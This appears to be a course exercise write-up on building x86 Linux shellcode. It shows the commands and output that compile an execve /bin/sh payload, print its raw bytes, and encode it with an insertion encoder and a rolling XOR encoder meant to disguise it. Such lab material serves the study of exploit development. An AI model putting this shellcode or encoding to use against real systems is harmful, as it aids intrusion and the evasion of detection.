Compiling and generating shellcode for execve-stack
Compile
First, we compile the default execve-stack shellcode as being used in the course.
$ ../compile_asm.sh execve-stack
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!Generate shellcode
$ ../convert_bin_sc.sh execve-stack
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"Using the Insertion Encoder from SLAE
As an example and to compare, we use the Insertion Encoder from the course which inserts a character every next character. Running the python script for encoding, we get the following output:
Insert-encoder
$ python insertion-encoder.py
Encoded shellcode ...
Hex shellcode
\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa
ASM shellcode
0x31,0xaa,0xc0,0xaa,0x50,0xaa,0x68,0xaa,0x2f,0xaa,0x2f,0xaa,0x73,0xaa,0x68,0xaa,0x68,0xaa,0x2f,0xaa,0x62,0xaa,0x69,0xaa,0x6e,0xaa,0x89,0xaa,0xe3,0xaa,0x50,0xaa,0x89,0xaa,0xe2,0xaa,0x53,0xaa,0x89,0xaa,0xe1,0xaa,0xb0,0xaa,0x0b,0xaa,0xcd,0xaa,0x80,0xaa,
Length: 25Using the custom encoder
As said, we’ll be using a rolling XOR-encoder using a random byte as initializing byte. We need to save the output to reuse in ASM, so keep that in mind.
$ python rolling-xor-encoder-random.py
[*] Encoding shellcode ...
[*] Hex shellcode
"\xfb\xca\x0a\x5a\x32\x1d\x32\x41\x29\x41\x6e\x0c\x65\x0b\x82\x61\x31\xb8\x5a\x09\x80\x61\xd1\xda\x17\x97"
[*] ASM shellcode
EncodedShellcode: db 0xfb,0xca,0x0a,0x5a,0x32,0x1d,0x32,0x41,0x29,0x41,0x6e,0x0c,0x65,0x0b,0x82,0x61,0x31,0xb8,0x5a,0x09,0x80,0x61,0xd1,0xda,0x17,0x97
[*] Length: 25